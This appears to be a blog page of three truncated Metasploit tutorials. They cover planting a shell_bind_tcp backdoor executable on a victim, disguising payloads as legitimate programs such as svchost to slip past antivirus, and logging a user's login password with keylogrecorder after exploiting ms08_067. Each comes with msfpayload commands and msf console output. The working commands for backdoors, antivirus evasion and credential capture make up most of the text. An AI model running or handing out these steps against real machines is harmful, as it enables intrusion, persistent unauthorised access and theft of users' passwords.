There are different ways to drop a backdoor on a target machine with meterpreter. For example, netcat can be uploaded to the victim and with a few registry hacks the backdoor runs when the user login, allowing for shell access; however, there are a few drawbacks with this method. First, it requires to edit the registry and creating new keys (lengthy process). Second, upon the user login you can see netcat running for a split second and closing. It doesn’t take a savvy user to know something is up. And third, is an unauthenticated backdoor, which means is open for anyone. The two approaches I’m taking here are also unauthenticated which is not recommended, but sometimes that is the only choice, and what is more important, they are already built into metasploit.
The first method is the payload “shell_bind_tcp” which is the equibalent of netcat, but without having to do any registry editing. Pauldotcom has an excellent tutorial about this. For this tutorial I’m assuming we got a meterpreter session going.
First, we create our backdoor.
msfpayload windows/shell_bind_tcp RHOST=192.168.1.100,LPORT=4444 x > evil.exe
RHOST is the remote box where you backdoor will be running waiting for connections. Read the rest of this entry »
One of the cool features of Metasploit is the ability to encode your payload into an executable; furthermore, msfencode “-x” option allows you to select a profile, which could be a legit executable like: putty, calc, notepad, etc, to embed your payload, and; therefore, making it more difficult to detect. Now, when trying to bypass antivirus, it is best to use a “stager” rather than a full “payload”…. why? Well, a stager is a small piece of code that allocates in memory, open network port to communicate with the framework, and then it downloads the rest of the payload. A stager is very small. It’s because of its size that antivirus have a hard time detecting it. However, a full payload has everything needed to execute. So first we will create an executable using a single payload, and put it through AV scans.
NOTE: every time you see “>” inside the scripts, it’s “>”
msfpayload windows/shell_bind_tcp RHOST=192.168.1.100,LPORT=4444 x > svchost10.exe
Now, let’s put it through AV scans, and….
So you got a meterpreter session on a remote client, and now you want to get password hashes; but sometimes you can’t use “hashdump” from meterpreter, specially if your session is not running as user with admin privileges. So how could you get the remote user password? Well, Metasploit has a script called “keylogrecorder,” which has an option to logoff the user, and record his login password. Note that for this to work, you need to migrate your process to “winlogon.exe.”
STEPS:
1- Ok, the first thing is to get a meterpreter session going. For this we’ll use a “netapi” exploit.
msf > search netapi [*] Searching loaded modules for pattern 'netapi'... Exploits ======== Name Rank Description ---- ---- ----------- windows/smb/ms03_049_netapi good Microsoft Workstation Service NetAddAlternateComputerName Overflow windows/smb/ms06_040_netapi great Microsoft Server Service NetpwPathCanonicalize Overflow windows/smb/ms06_070_wkssvc normal Microsoft Workstation Service NetpManageIPCConnect Overflow windows/smb/ms08_067_netapi great Microsoft Server Service Relative Path Stack Corruption msf> use exploit/windows/smb/ms08_067_netapi
2- now we need to set the options for this exploit.
msf exploit(ms08_067_netapi)> show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Exploit target: Id Name -- ---- 0 Automatic Targeting msf exploit(ms08_067_netapi)> set RHOST 172.16.10.105 RHOST => 172.16.10.105
Designed By :
